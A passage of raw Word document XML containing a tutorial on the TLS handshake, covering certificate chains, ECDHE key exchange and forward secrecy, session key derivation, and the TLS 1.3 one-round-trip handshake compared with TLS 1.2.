        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  - Signature: (signed by issuer's private key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1B6798" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C62011E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Intermediate Certificate (Let's Encrypt Authority X3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D1C001" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  - Issuer: ISRG Root X1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFB39E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  - Signature: (signed by root's private key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605A724A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF5C13" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- (Root certificate NOT sent — client already has it in trust store)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDBFA8C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(4) ServerKeyExchange (for ECDHE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4127CF29" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The server generates an ephemeral key pair and sends the public portion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F432CF1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1FD33F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- EC Curve: x25519</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7EC7B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Server's Ephemeral Public Key: (32 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C38074C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Signature: (server signs the above with its certificate's private key,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7CB591" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">              proving it owns the certificate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674E560A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why ephemeral keys matter (Forward Secrecy):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434799B8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If the server's certificate private key is compromised years later, an attacker who recorded the encrypted traffic CANNOT decrypt it. Because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE10AC0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="877"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The session key was derived from the ephemeral ECDHE key exchange.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50663899" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="877"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The ephemeral private key was destroyed after the handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C961F0B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="877"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The certificate private key was only used to SIGN (authenticate), not encrypt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2631E48E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="877"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Without the ephemeral private key, past traffic remains secure forever.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6319E34A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(5) ServerHelloDone:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Server says "I'm done with my part of the handshake."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73318790" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(6) ClientKeyExchange:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2A9EEA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client generates its own ephemeral key pair:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F5DBC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525BD042" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Client's Ephemeral Public Key: (32 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27516173" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Now both sides can compute the shared secret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78143AB6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1D5253" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client computes: shared_secret = ECDH(client_private_key, server_public_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEC1DE1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Server computes: shared_secret = ECDH(server_private_key, client_public_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734337DF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C35F05" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Both get the SAME value (the mathematical property of Diffie-Hellman).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06212A25" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>From this shared secret, both derive session keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415A9380" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD968F8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>PRF(shared_secret, "master secret", client_random + server_random) → master_secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119CD946" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">PRF(master_secret, "key expansion", server_random + client_random) → </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49480A7A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    client_write_key, server_write_key, client_write_IV, server_write_IV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC6BF10" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(7-10) ChangeCipherSpec + Finished:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429CB35C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Both sides switch to encrypted communication and send a "Finished" message (encrypted with the new keys). The Finished message contains a hash of all handshake messages — verifying that both sides saw the same handshake (no tampering).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1099B5A7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 TLS 1.3 Handshake (Optimized — 1 RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DA8A5A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS 1.3 reduces the handshake to 1 round trip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FA91DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BA85CE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client                                          Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AC045B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |                                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2FECB4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |──── ClientHello + KeyShare ──────────────────&gt;|  (1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15988079" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |                                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16855596" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── ServerHello + KeyShare ──────────────────|  (2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143114BE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── {EncryptedExtensions} ───────────────────|  (3) encrypted from here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F567CF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── {Certificate} ──────────────────────────|  (4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169C3F2D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── {CertificateVerify} ────────────────────|  (5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03306610" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── {Finished} ─────────────────────────────|  (6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C81694" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |                                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01171067" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  |──── {Finished} ──────────────────────────────&gt;|  (7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDCE15C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |──── {HTTP Request} ──────────────────────────&gt;|  (can be sent with Finished!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BE6B20" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |                                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542094CC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── {HTTP Response} ────────────────────────|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F93ECA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How 1-RTT is achieved:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EA7557" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The client sends its key share IN the ClientHello (guesses which curve the server will use). The server responds with its key share immediately. Both can derive keys after the first exchange — no waiting for an additional round trip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A48004" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key differences from TLS 1.2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED0171B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Only 5 cipher suites (all AEAD, all with forward secrecy). No legacy/weak options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1013581A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Ephemeral key exchange is MANDATORY (always forward secret).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5127A97F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>RSA key exchange is REMOVED (was not forward-secret).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E54FC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Server certificate is encrypted (not visible to network observers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F3E4F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="878"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>0-RTT resumption is possible (see below).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117632CC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
